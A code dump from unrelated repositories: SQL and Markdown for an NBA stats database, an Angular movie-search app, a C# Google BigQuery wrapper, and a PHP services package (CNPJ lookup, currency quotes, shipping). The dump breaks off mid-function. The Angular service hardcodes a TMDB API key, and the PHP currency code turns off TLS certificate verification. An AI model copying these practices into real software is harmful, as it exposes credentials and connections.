ThreePP, TwoP, TwoPA, TwoPP, eFGP, FT, FTA, FTP, ORB, DRB, TRB, AST, STL, BLK, TOV, PF, PTS); -- Load Players LOAD DATA LOCAL INFILE '/Data/Players.csv' INTO TABLE Players FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (Name, Pos, Age); -- Load Team Stats LOAD DATA LOCAL INFILE '/Data/Team_Stats.csv' INTO TABLE Team_Stats FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (TeamID, G, MP, FG, FGA, FGP, ThreeP, ThreePA, ThreePP, TwoP, TwoPA, TwoPP, FT, FTA, FTP, ORB, DRB, TRB, AST, STL, BLK, TOV, PF, PTS); -- Load Teams LOAD DATA LOCAL INFILE '/Data/Teams.csv' INTO TABLE Teams FIELDS TERMINATED BY ',' LINES TERMINATED BY '\r\n' IGNORE 1 LINES (TeamID, TeamName, TeamAbbr, Location); <file_sep>use nba_17_18; -- Creating analytical layer for player statistics DROP PROCEDURE IF EXISTS CreatePlayersAnalytic; DELIMITER // CREATE PROCEDURE CreatePlayersAnalytic() BEGIN DROP TABLE IF EXISTS Players_Analytic; CREATE TABLE Players_Analytic AS SELECT Players.Name, Players.Pos As Position, Players.Age As Age, Player_Stats.TM As Franchise, Player_Stats.Gms As Games, Player_Stats.MP As MinutesPlayed, Player_Stats.FG As FieldGoals, Player_Stats.FGA As FieldGoalsAttempt, Player_Stats.FGP As FieldGoalsPercent, Player_Stats.PTS As Points FROM Players JOIN Player_Stats ON name = Player ORDER BY Name; END // DELIMITER ; drop event if exists CreatePlayersAnalyticEvent; -- Creating an event for Players analytics tables to see when table is updated CREATE EVENT CreatePlayersAnalyticEvent ON SCHEDULE EVERY 1 MINUTE STARTS CURRENT_TIMESTAMP ENDS CURRENT_TIMESTAMP + INTERVAL 1 HOUR DO CALL CreatePlayersAnalytic(); INSERT INTO messages(message,created_at) VALUES('Player Mart Created',NOW()); SELECT * FROM messages; -- Creating data marts as views to answer the analytic questions -- Players that averaged 25 or more points per game and how many games they played DROP VIEW IF EXISTS TopPPG; CREATE VIEW `TopPPG` AS SELECT Name, Position, Age, Games, 
ROUND(Points/Games, 2) AS ppg FROM Players_Analytic WHERE Points/Games >= 25; SELECT * FROM TopPPG; -- Top 10 most time efficient scorers in the league DROP VIEW IF EXISTS TopTimeEfficient; CREATE VIEW `TopTimeEfficient` AS SELECT Name, Position, Points, MinutesPlayed, ROUND (pointsPer48, 2) AS PointsPer48 FROM ( SELECT Name, Position, Points, MinutesPlayed, CAST(Points as FLOAT)*48/CAST(MinutesPlayed as FLOAT) as PointsPer48 FROM Players_Analytic WHERE Points > 0 AND MinutesPlayed > 0) as ps ORDER BY PointsPer48 DESC LIMIT 10; SELECT * FROM TopTimeEfficient; -- Players who played half the season or less but still averaged 15 points DROP VIEW IF EXISTS HalfSeason15Points; CREATE VIEW `HalfSeason15Points` AS SELECT Name, Position, Games, Points, ROUND (CAST(Points as FLOAT)/CAST(Games as FLOAT),2) as PPG FROM Players_Analytic WHERE Games <= 41 AND CAST(Points as FLOAT)/CAST(Games as FLOAT) > 15 AND Points > 0 ORDER BY CAST(Points as FLOAT)/CAST(Games as FLOAT) DESC; SELECT * FROM HalfSeason15Points; <file_sep>-- Creating a datamart for teams, coaches, team statistics use nba_17_18; DROP PROCEDURE IF EXISTS CreateTeamCoachAnalytic; DELIMITER // CREATE PROCEDURE CreateTeamCoachAnalytic() BEGIN Drop table if exists Team_Coach_Analytic; CREATE TABLE Team_Coach_Analytic AS SELECT Teams.TeamID, Coaches.name AS Coach, Teams.TeamName As Franchise, Teams.TeamAbbr As Short_Franchise, Teams.Location As City, Team_Stats.G As Games, Team_Stats.FG As FieldGoals, Team_Stats.FGA As FieldGoalsAttempt, Team_Stats.FGP As FieldGoalsPercent, Team_Stats.ThreeP As Team_3P, Team_Stats.ThreePA As Team_3PA, Team_Stats.ThreePP As Team_3PP, Team_Stats.AST As Assist, Team_Stats.STL As Steal, Team_Stats.BLK As BlockShot, Team_Stats.TOV As Turnover, Team_Stats.PF As Fouls, Team_Stats.PTS As Points FROM Teams JOIN Team_Stats ON Teams.teamid = team_stats.teamid JOIN Coaches ON Teams.teamid = coaches.teamid ORDER BY TeamID ; END // DELIMITER ; -- Creating messages table to caprture event DROP TABLE 
IF EXISTS MESSAGES; CREATE TABLE messages ( id INT PRIMARY KEY AUTO_INCREMENT, message VARCHAR(255) NOT NULL, created_at DATETIME NOT NULL ); -- Creating an event for Team Stat Coach Data Analytic DROP EVENT IF EXISTS CreateTeamCoachAnalyticEvent; CREATE EVENT CreateTeamCoachAnalyticEvent ON SCHEDULE EVERY 1 MINUTE STARTS CURRENT_TIMESTAMP ENDS CURRENT_TIMESTAMP + INTERVAL 1 HOUR DO CALL CreateTeamCoachAnalytic(); INSERT INTO messages(message,created_at) VALUES('Team Stats Coach Mart Created',NOW()); -- Checking the messages table SELECT * FROM messages; -- Potential Analytics that can be done with Team and Coach data using views -- Top 10 Coaches by defence. Showstop 10 defensive coaches including aggreagated and per game stats for steals, rebounds and Blocked shots. Ordered by steals, assuming steals are the ultimate goal of a tema on defence DROP VIEW IF EXISTS CoachesByDefence; CREATE VIEW `CoachesByDefence` AS SELECT Coach, Franchise, Steal, ROUND(Steal/games, 2) AS StealperGm , BlockShot, ROUND(BlockShot/games, 2) AS BlockShotPerGm, Fouls, ROUND(fouls/games, 2) AS FoulsPerGm FROM Team_Coach_Analytic ORDER BY Steal DESC LIMIT 10; SELECT * FROM CoachesByDefence; -- Shooting patterns of different teams depending on coach in terms of 3 point shootin and its effects the Filed Goal and Effective Field Goal percentages DROP VIEW IF EXISTS CoachesBy3PShooting; CREATE VIEW `CoachesBy3PShooting` AS SELECT Coach, Franchise, Team_3PA, Team_3P, ROUND (Team_3PP, 2) AS Team_3PP, ROUND(FieldGoalsPercent, 2) AS FieldGoal, ROUND((FieldGoals + (0.5 * team_3P))/FieldGoalsAttempt, 2)as eFieldGoal FROM Team_Coach_Analytic ORDER BY Team_3P DESC; SELECT * FROM CoachesBy3PShooting; -- Coaches who move the ball the most (assist on field goal ratio is over 0.5) and how it affects the turnovers DROP VIEW IF EXISTS CoachesByPassing; CREATE VIEW `CoachesByPassing` AS SELECT Franchise, Assist, ROUND(CAST(Assist as FLOAT)/CAST(FieldGoals as FLOAT), 2) as AssistOnFieldGoalRatio, Turnover 
FROM Team_Coach_Analytic WHERE CAST(assist as FLOAT)/CAST(fieldgoals as FLOAT) > .5; SELECT * FROM CoachesByPassing; <file_sep>## Codes Contains all the codes that are used to upload the data to MySQL and obtain the answers to the analytical questions. The specific codes are listed below. #### Upload Code (upload_code_nba) The code used to upload the data to MySQL Workbench. #### Player Analytics (individual_player_analytic.sql) The individual_player_analytic.sql holds the code for the player-level analytic layer. It also includes the code for all of the establised views. #### Team Analytics (team_coach_analytic.sql) Includes the code for analytic layer focused on team and coach statistics as well as the susequent views. <file_sep># Term_DE1 ## Project Description ### OPERATIONAL LAYER: The data includes National Basketball Association (NBA) statistics for players, teams and coaches for 2017-2018 season. The relational database can be seen below. ![Figure 1 - Relational Database NBA](Images/RelationSchema1.png) CSV files were used to store the raw data. Then a schema and tables were created with the same attributes as the CSV files. Finally, the data was inserted into MySQL using the following command * LOAD DATA * LOCAL INFILE 'path_to_csv_file' * INTO TABLE 'corresponding_table' * FIELDS TERMINATED BY ',' * LINES TERMINATED BY '\r\n' * IGNORE 1 LINES ### ANALYTICAL LAYER: After the tables were loaded to MySQL, the analytical data layer was established. Due to the fact that not all of the tables in the operationla layer can be related to each other, the decision to create two analytical tables was made. The tables are created using events which re-create them every minute for an hour and record the times of creation to a table called “messages”. Below is amore deatailed description for each of the created tables. 1. Team_Coach_Analytic: includes information about teams such as the Franchise name, name abbreviation, city/state and the coach. 
In addition, it includes both defensive and offensive statistics. This can provide insight to team performance for he season, using both the already available data and trnformed data (e.g. assist on field goal percentage). 1. Players_Analytic: includes the players’ attributes such as name, age, position and franchise as well as individual performance metrics like games played. Data from this layer provides the opportunity to create more detailed analytic insight to see what player were major contributors to team performance. By creating views from the above data marts, we can potentially answer the following question. ### ETL The process of ETL included the extraction of chosen metrics from the Aanlytical Layer, transformation by using arithmetic operations (where applicable), combibing the outcomes with readily available data and loading back to views which provide answers to the questions listed below. ### POTENTIAL ANALYTICS: #### Team Level (Team_Coach_Analytic) * Question 1: Who are the top 10 defensive coaches including aggreagated and per game stats for steals, rebounds and Blocked shots. The view is ordered by steals, assuming steals are the ultimate goal of a tema on defence. * Question 2: What are the shooting patterns in terms of 3 point shooting and how it effects the Filed Goal and Effective Field Goal percentages? * Question 3: Which Coaches move the ball the most (assist on field goal ratio is over 0.5) and how it affects the turnovers? #### Player Level (Players_Analytic) * Question 1: Which players averaged over 25 points per game and how amny games they played? * Question 2: Who was the most time (48 minutes) efficient scorer in the league? * Question 3: What players played less than or equal to half the season but scored over 15 points a game? ### DATA MART: The following queries result in views that provide answers to the questions listed above. 
#### Team Level * Question 1: SELECT * FROM CoachesByDefence; ![Figure 2 - Top 10 Defensive Coaches](Images/CoachPerDefence.png) * Question 2: SELECT * FROM CoachesBy3PShooting; ![Figure 3 - Top 10 Coaches by Shooting Patterns](Images/CoachesBy3PShooting.png) * Question 3: SELECT * FROM CoachesByAssist; ![Figure 4 - Coaches by Passing](Images/CoachesByPassing.png) #### Individual Level * Question 1: SELECT * FROM TopPPG; ![Figure 8 - Top Scorers per Game](Images/TopScorers.png) * Question 2: SELECT * FROM TopTimeEfficient; ![Figure 9 - Top 10 Most Time Efficient Players](Images/PointsPer48.png) * Question 3: SELECT * FROM HalfSeason15Points; ![Figure 10 - PLayers that Played Half Season or Less but Avearged at least 15 PPG ](Images/HalfSeason15Points.png)
605e5b9afd106017131880e055192b23c11928f5
[ "Markdown", "SQL" ]
8
Markdown
steveJ34/Term_DE1
0f9f8da166b53cf4bfde7239a030924c0e0da0b1
38aa378d801bde2ff34c81a3b3b6162edf029905
refs/heads/master
<file_sep>import { Pipe, PipeTransform } from '@angular/core' @Pipe({ name: 'noimage' }) export class NoimagePipe implements PipeTransform { transform(url: string): string { if (!url) { return 'assets/img/noimage.png' } return url } } <file_sep>import { Component } from '@angular/core' import { PeliculasService } from 'src/app/services/peliculas.service' @Component({ selector: 'app-tarjetas', templateUrl: './tarjetas.component.html', styleUrls: ['./tarjetas.component.css'] }) export class TarjetasComponent { public peliculas: any[] = [] public opcion: string = 'actuales' public loading: boolean = true public parametro: string imagenUrl: string = 'image.tmdb.org/t/p/w300/' constructor(private _ps: PeliculasService) { this._ps.getPeliculas(this.opcion).subscribe((data: any) => { this.peliculas = data.results }) this.esperar() } getPeliculas(opcion: string) { this.loading = true this._ps.getPeliculas(opcion).subscribe((data: any) => { this.peliculas = data.results }) this.esperar() } buscar(parametro: string) { this.loading = true this._ps.buscar(parametro).subscribe((data: any) => { this.peliculas = data.results }) this.esperar() } esperar() { setTimeout(() => { this.loading = false }, 800) } } <file_sep>import { Component } from '@angular/core' import { ActivatedRoute } from '@angular/router' import { PeliculasService } from 'src/app/services/peliculas.service' import { Location } from '@angular/common' @Component({ selector: 'app-pelicula', templateUrl: './pelicula.component.html', styleUrls: ['./pelicula.component.css'] }) export class PeliculaComponent { public pelicula: any = {} public loading: boolean = true public image: boolean = true private id: string constructor(private _ps: PeliculasService, private route: ActivatedRoute, private _location: Location) { this.route.params.subscribe(params => { this.id = params['id'] this._ps.getPelicula(this.id).subscribe((data: any) => { this.pelicula = data if (!data.backdrop_path) { this.image = false } }) this.esperar() 
}) } regresar() { this._location.back() } esperar() { setTimeout(() => { this.loading = false }, 500) } } <file_sep>import { Injectable } from '@angular/core' import { HttpClient } from '@angular/common/http' import { map } from 'rxjs/operators' @Injectable({ providedIn: 'root' }) export class PeliculasService { private apikey: string = '4fa158e44a3f1a9dd31e58b7f97449c8' private urlMovieDb: string = 'https://api.themoviedb.org/3' constructor(private http: HttpClient) {} getCarteleraActual() { let hoy = new Date() let dosSemanasAtras = new Date(hoy.getTime() - 864000000) dosSemanasAtras = new Date(dosSemanasAtras) let url = `${this.urlMovieDb}/discover/movie?primary_release_date.gte=${ dosSemanasAtras.toISOString().split('T')[0] }&primary_release_date.lte=${hoy.toISOString().split('T')[0]}&api_key=${ this.apikey }&language=es&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } getPopulares() { let url = `${this.urlMovieDb}/discover/movie?sort_by=popularity.desc&api_key=${ this.apikey }&language=es&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } getKidsPopulares() { let url = `${ this.urlMovieDb }/discover/movie?certification_country=US&certification.lte=G&sort_by=popularity.desc&api_key=${ this.apikey }&language=es&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } getPeliculas(categoria: string) { if (categoria === 'actuales') { return this.getCarteleraActual() } else if (categoria === 'populares') { return this.getPopulares() } else if (categoria === 'kids') { return this.getKidsPopulares() } else { return this.getCarteleraActual() } } getPelicula(id: string) { let url = `${this.urlMovieDb}/movie/${id}?api_key=${ this.apikey }&language=es&external_source=freebase_id&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } buscar(parametro: string) { let url = `${this.urlMovieDb}/search/movie?api_key=${ this.apikey 
}&language=es&query=${parametro}&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } } //https://api.themoviedb.org/3/search/movie?api_key={api_key}&query=Jack+Reacher // https://api.themoviedb.org/3/find/{external_id}?api_key=<<api_key>>&language=en-US&external_source=imdb_id <file_sep>export interface Pelicula { title: string rating: number sinopsis: string genero: string estreno: Date elenco: string[] }
c10f77a2beb07900dd509f395f3fd5f015b4602f
[ "TypeScript" ]
5
TypeScript
norbe1994/peliculas-app
fc4942be15b8c7baf9ee840e828dcbb411454bfe
fb69ed1b6b108bd43378e96e8f4a101ec6d2e9b7
refs/heads/master
<repo_name>M3LiNdRu/BigQuery.Net.Service<file_sep>/CustomBigQuery.Test/UnitTestTable.cs using System; using Microsoft.VisualStudio.TestTools.UnitTesting; using Google.Apis.Bigquery.v2; using Custom.BigQuery.Service; using System.Diagnostics; namespace CustomBigQuery.Test { [TestClass] public class UnitTestTable { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodCreateTable() { BigqueryService bq = auth.getServiceAuthP12(); TableService t = new TableService(bq, "api-project-109606543851"); t.CreateTable(typeof(GsodModel), "test"); Debug.WriteLine("Hello"); Assert.IsNotNull(bq); } } } <file_sep>/CustomBigQuery.Test/UnitTestQuery.cs using Custom.BigQuery.Service; using Google.Apis.Bigquery.v2; using Microsoft.VisualStudio.TestTools.UnitTesting; using Newtonsoft.Json.Linq; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading.Tasks; namespace CustomBigQuery.Test { [TestClass] public class UnitTestQuery { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodQueryJSON() { BigqueryService bq = auth.getServiceAuthP12(); QueryService q = new QueryService(bq, "api-project-109606543851"); JObject json = q.GetData("SELECT station_number, wban_number FROM [publicdata:samples.gsod] LIMIT 10"); Debug.WriteLine(json); Assert.IsNotNull(bq); } [TestMethod] public void TestMethodQueryObject() { BigqueryService bq = auth.getServiceAuthP12(); QueryService q = new QueryService(bq, "api-project-109606543851"); List<GsodModel> obj = q.GetData<GsodModel>("SELECT station_number, wban_number FROM [publicdata:samples.gsod] LIMIT 10"); Debug.WriteLine(obj); Assert.IsNotNull(obj); } } } <file_sep>/Custom.BigQuery.Service/Services/Query.cs using Google.Apis.Bigquery.v2; using Google.Apis.Bigquery.v2.Data; using Newtonsoft.Json.Linq; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using 
System.Threading.Tasks; namespace Custom.BigQuery.Service { public class QueryService { private BigqueryService bq; private string projectId; private BigQueryDataSerializer deserializer; public QueryService(BigqueryService service, string projectId) { this.bq = service; this.projectId = projectId; this.deserializer = new BigQueryDataSerializer(); } //TODO: Implement pagination public JObject GetData(string query) { JObject list = new JObject(); JobsResource j = bq.Jobs; QueryRequest qr = new QueryRequest(); qr.Query = query; QueryResponse response = j.Query(qr, projectId).Execute(); if (response.Rows != null) { int cnt = 0; foreach (TableRow row in response.Rows) { int cnt2 = 0; JObject element = new JObject(); foreach (TableCell field in row.F) { element.Add(new JProperty("Camp " + cnt2, field.V)); ++cnt2; } list.Add("Fila " + cnt, element); ++cnt; } } else list.Add("null"); return list; } //TODO: Implement pagination public List<T> GetData<T>(string query) where T : new() { List<T> rows; JobsResource j = bq.Jobs; QueryRequest qr = new QueryRequest(); qr.Query = query; QueryResponse response = j.Query(qr, projectId).Execute(); if (response.JobComplete ?? 
false) { rows = response.Rows.Select(row => deserializer.Deserialize<T>(row, response.Schema)).ToList(); return rows; } return null; } } } <file_sep>/CustomBigQuery.Test/UnitTestAuth.cs using System; using Microsoft.VisualStudio.TestTools.UnitTesting; using Custom.BigQuery.Service; using Google.Apis.Bigquery.v2; namespace CustomBigQuery.Test { [TestClass] public class UnitTestAuth { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodClientAuth() { BigqueryService bq = auth.getAuth(); Assert.IsNotNull(bq); } [TestMethod] public void TestMethodServiceAuth() { BigqueryService bq = auth.getServiceAuthP12(); Assert.IsNotNull(bq); } } } <file_sep>/CustomBigQuery.Test/GsodModel.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace CustomBigQuery.Test { public class GsodModel { public int station_number { get; set; } public int wban_number { get; set; } public int year { get; set; } } } <file_sep>/Custom.BigQuery.Service/Services/Table.cs using Google.Apis.Bigquery.v2; using Google.Apis.Bigquery.v2.Data; using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class TableService { private BigqueryService bq; private string projectId; private BigQueryDataSerializer serializer; public TableService(BigqueryService service, string projectId) { this.bq = service; this.projectId = projectId; this.serializer = new BigQueryDataSerializer(); } public bool CreateTable(Type type, string datasetId) { Table body = createBody(type, datasetId); TablesResource t = new TablesResource(this.bq); Table response = t.Insert(body, this.projectId, datasetId).Execute(); return body.Equals(response); } /// <summary> /// Replace old table for new table with empty rows /// </summary> /// <param name="s"></param> /// <param name="datasetId"></param> /// <param name="tableId"></param> public bool 
ReplaceTable(String datasetId, String tableId) { TablesResource t = new TablesResource(this.bq); Table body = t.Get(projectId, datasetId, tableId).Execute(); if (this.DeleteTable(datasetId, tableId) == "") { Table newTable = new Table() { Schema = body.Schema, TableReference = new TableReference() { DatasetId = datasetId, ProjectId = projectId, TableId = body.TableReference.TableId } }; Table aux = t.Insert(newTable, projectId, datasetId).Execute(); return body.Equals(aux); } return false; } public string DeleteTable(String datasetId, String tableId) { TablesResource t = new TablesResource(this.bq); return t.Delete(projectId, datasetId, tableId).Execute(); } private Table createBody(Type t, string datasetId) { Table body = new Table() { Description = t.FullName, FriendlyName = t.Name, Schema = this.serializer.GetSchema(t), TableReference = new TableReference() { DatasetId = datasetId, ProjectId = this.projectId, TableId = t.Name } }; return body; } } } <file_sep>/Custom.BigQuery.Service/BqSerializer.cs using Google.Apis.Bigquery.v2.Data; using System; using System.Collections.Generic; using System.Dynamic; using System.Globalization; using System.Linq; using System.Reflection; using System.Text; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class BigQueryDataSerializer { public T Deserialize<T>(TableRow row, TableSchema schema) where T : new() { T obj = new T(); var props = typeof(T).GetProperties(); using(var e1 = schema.Fields.GetEnumerator()) using(var e2 = row.F.GetEnumerator()) { while(e1.MoveNext() && e2.MoveNext()) { string name = e1.Current.Name; string type = e1.Current.Type; string value = (string)e2.Current.V; var prop = props.Where(x => x.Name.Equals(name)).SingleOrDefault(); if (prop != null) prop.SetValue(obj, Parse(type, value)); } } return obj; } public TableDataInsertAllRequest.RowsData Serialize<T>(T obj) { TableDataInsertAllRequest.RowsData row = new TableDataInsertAllRequest.RowsData() { InsertId = 
Guid.NewGuid().ToString(), Json = AsDictionary(obj) }; return row; } public TableSchema GetSchema(Type type) { TableSchema schema = new TableSchema() { Fields = new List<TableFieldSchema>() }; var props = type.GetProperties(); foreach (var prop in props) { schema.Fields.Add(new TableFieldSchema() { Description = prop.Name, Name = prop.Name, Type = GetBQType(prop.PropertyType) }); } return schema; } private object Parse(string type, string value) { if (value == null) return null; switch (type) { case "STRING": return value; case "INTEGER": return int.Parse(value, CultureInfo.InvariantCulture); case "FLOAT": return double.Parse(value, CultureInfo.InvariantCulture); case "BOOLEAN": return bool.Parse(value); case "TIMESTAMP": return DateTime.Parse(value); case "RECORD": throw new InvalidOperationException("Deserializer can't need support record type."); default: throw new InvalidOperationException("UNKNOWN TYPE:" + type); } } private string GetBQType(Type t) { if (t.Equals(typeof(int))) return "INTEGER"; else if (t.Equals(typeof(double))) return "FLOAT"; else if (t.Equals(typeof(bool))) return "BOOLEAN"; else if (t.Equals(typeof(DateTime))) return "TIMESTAMP"; else if (t.Equals(typeof(string))) return "STRING"; return "RECORD"; } private IDictionary<string, object> AsDictionary(object source) { return source.GetType().GetProperties().ToDictionary ( propInfo => propInfo.Name, propInfo => propInfo.GetValue(source, null) ); } } } <file_sep>/Custom.BigQuery.Service/Services/Job.cs using Google.Apis.Bigquery.v2; using Google.Apis.Bigquery.v2.Data; using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class JobService { private BigqueryService bq; private string projectId; private BigQueryDataSerializer serializer; public JobService(BigqueryService service, string projectId) { this.bq = service; this.projectId = projectId; this.serializer = new 
BigQueryDataSerializer(); } public void InsertAll<T>(List<T> data, string datasetId, string tableId) { //Map original object to destiny List<TableDataInsertAllRequest.RowsData> rows = data.Select(x => serializer.Serialize<T>(x)).ToList(); try { TabledataResource t = this.bq.Tabledata; TableDataInsertAllRequest req = new TableDataInsertAllRequest() { Kind = "bigquery#tableDataInsertAllRequest", Rows = rows }; TableDataInsertAllResponse response = t.InsertAll(req, projectId, datasetId, tableId).Execute(); if (response.InsertErrors != null) { } } catch (Exception e) { } } public void InsertPOST() { } } } <file_sep>/Custom.BigQuery.Service/Services/Auth.cs using Google.Apis.Auth.OAuth2; using Google.Apis.Bigquery.v2; using Google.Apis.Services; using Google.Apis.Util.Store; using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Security.Cryptography.X509Certificates; using System.Text; using System.Threading; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class AuthService { private static string projectId = "api-project-XXXXXXXXXXXX"; private static byte[] jsonSecrets = Custom.BigQuery.Service.Properties.Resources.client_secrets; private static string serviceAccountEmail = "<EMAIL>"; private static string P12password = "<PASSWORD>"; private static byte[] P12Key = Properties.Resources.API_Project_XXXXXXXXXXXX; private static byte[] JSONKey = Properties.Resources.API_Project_XXXXXXXXXXXX; private static string APPLICATION_NAME = "Google-BigQuery-CustomService/v0.1"; public BigqueryService getServiceAuthP12() { try { X509Certificate2 certificate = new X509Certificate2(P12Key, P12password, X509KeyStorageFlags.Exportable); ServiceAccountCredential credential; credential = new ServiceAccountCredential(new ServiceAccountCredential. 
Initializer(serviceAccountEmail) { Scopes = new[] { BigqueryService.Scope.Bigquery, BigqueryService.Scope.CloudPlatform } }.FromCertificate(certificate)); var service = new BigqueryService(new BaseClientService.Initializer() { HttpClientInitializer = credential, ApplicationName = APPLICATION_NAME }); return service; } catch (Exception e) { String a = e.InnerException.Data.ToString(); return null; } } //TODO: Not Implemented public BigqueryService getServiceAuthJSON() { try { return null; } catch (Exception e) { return null; } } public BigqueryService getAuth() { try { UserCredential credential; using (var stream = new MemoryStream(jsonSecrets)) { GoogleWebAuthorizationBroker.Folder = "Bigquery.Auth.Store"; credential = GoogleWebAuthorizationBroker.AuthorizeAsync( GoogleClientSecrets.Load(stream).Secrets, new[] { BigqueryService.Scope.Bigquery, BigqueryService.Scope.CloudPlatform }, "user", CancellationToken.None, new FileDataStore("Bigquery.Auth.Store") ).Result; } // Create the service. 
var service = new BigqueryService(new BaseClientService.Initializer() { HttpClientInitializer = credential, ApplicationName = APPLICATION_NAME }); return service; } catch (Exception e) { String a = e.InnerException.Data.ToString(); return null; } } } } <file_sep>/CustomBigQuery.Test/UnitTestJobs.cs using Custom.BigQuery.Service; using Google.Apis.Bigquery.v2; using Microsoft.VisualStudio.TestTools.UnitTesting; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading.Tasks; namespace CustomBigQuery.Test { [TestClass] public class UnitTestJobs { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodInsertAll() { BigqueryService bq = auth.getServiceAuthP12(); JobService job = new JobService(bq, "api-project-109606543851"); List<GsodModel> gsodData = new List<GsodModel>() { new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, }; job.InsertAll<GsodModel>(gsodData,"prova","test"); Debug.WriteLine("Hola"); Assert.IsNotNull(bq); } } }
0ee2d89134092a67f33d579cb7f99f30b003b65b
[ "C#" ]
10
C#
M3LiNdRu/BigQuery.Net.Service
84fda7f446abe00f2d249d59694e456f3684d2e8
09b8ac2e8f32685002cbb92fcf13460a602e42a7
refs/heads/main
<repo_name>wcast/services<file_sep>/tests/Feature/CnpjTest.php <?php namespace WCast\Services\Tests\Feature; class CnpjTest extends TestCas { /** * A basic test example. * * @return void */ public function testBasicTest() { $this->assertTrue(true); } } <file_sep>/tests/Unit/CnpjTest.php <?php namespace WCast\Services\Tests\Unit; use Tests\TestCase; use WCast\Services\Cnpj; class CnpjTest extends TestCase { /** * A basic test example. * * @return void */ public function testBasicTest() { $consulta = new Cnpj(); $consulta->consultaCNPJ(['cnpj' => '', 'captcha' => '']); $this->assertTrue(true); } } <file_sep>/src/CotacaoMoeda.php <?php namespace WCast\Services; /** * Estudar * https://www.bcb.gov.br/estabilidadefinanceira/cotacoestodas * */ class CotacaoMoeda { public function dolar(){ $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, 'https://ptax.bcb.gov.br/ptax_internet/consultarUltimaCotacaoDolar.do'); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); ob_start(); curl_exec($ch); curl_close($ch); $file_contents = ob_get_contents(); ob_end_clean(); $html = explode(' ', strip_tags($file_contents)); return "$".trim($html[340]); } } <file_sep>/src/Correios.php <?php namespace WCast\Services; class Correios { public function calculaFrete($data = []) { $cep = str_replace('-', '', $data['cep_destino']); $url = 'http://ws.correios.com.br/calculador/CalcPrecoPrazo.aspx?'; $query = [ 'sCepOrigem' => getenv('FRETE_CEP_ORIGEM'), 'sCepDestino' => $cep, 'nVlPeso' => 1, 'nVlValorDeclarado' => 100, 'nCdServico' => 40010, 'StrRetorno' => 'xml', 'nIndicaCalculo' => 3 ]; $url .= http_build_query($query); $xml = simplexml_load_file($url, 'SimpleXMLElement', LIBXML_NOCDATA); if ($xml->cServico->Erro == 0) { $retorno['status'] = 200; $retorno['valor'] = $xml->cServico->Valor; $retorno['prazo'] = $xml->cServico->PrazoEntrega; } else { $retorno['status'] = 500; $retorno['erro'] = $xml->cServico->MsgErro; } return $retorno; 
die; } } <file_sep>/src/Cnpj.php <?php namespace WCast\Services; use Symfony\Component\DomCrawler\Crawler; class Cnpj { public $pasta_cookies = ''; public $cookie_file = ''; public $cookie_content = ''; public $cookie = ''; private $attributes = [ 'NOME EMPRESARIAL' => 'razao_social', 'TÍTULO DO ESTABELECIMENTO (NOME DE FANTASIA)' => 'nome_fantasia', 'CÓDIGO E DESCRIÇÃO DA ATIVIDADE ECONÔMICA PRINCIPAL' => 'cnae_principal', 'CÓDIGO E DESCRIÇÃO DA NATUREZA JURÍDICA' => 'cnaes_secundario', 'LOGRADOURO' => 'logradouro', 'NÚMERO' => 'numero', 'COMPLEMENTO' => 'complemento', 'CEP' => 'cep', 'BAIRRO/DISTRITO' => 'bairro', 'MUNICÍPIO' => 'cidade', 'UF' => 'uf', 'SITUAÇÃO CADASTRAL' => 'situacao_cadastral', 'DATA DA SITUAÇÃO CADASTRAL' => 'situacao_cadastral_data', 'DATA DA SITUAÇÃO ESPECIAL' => 'situacao_especial', 'TELEFONE' => 'telefone', 'ENDEREÇO ELETRÔNICO' => 'email', 'ENTE FEDERATIVO RESPONSÁVEL (EFR)' => 'responsavel', 'DATA DE ABERTURA' => 'data_abertura' ]; public function __construct() { session_start(); $this->pasta_cookies = storage_path('wcast/cookies/'); $this->cookie_file = $this->pasta_cookies . 'cnpj_' . session_id(); if (!file_exists($this->cookie_file)) { $file = fopen($this->cookie_file, 'a+'); fclose($file); chmod($this->cookie_file, 0777); } } public function getCaptcha($id_session = 0) { $this->pasta_cookies = storage_path('wcast/cookies/'); $this->cookie_file = $this->pasta_cookies . 'cnpj_' . 
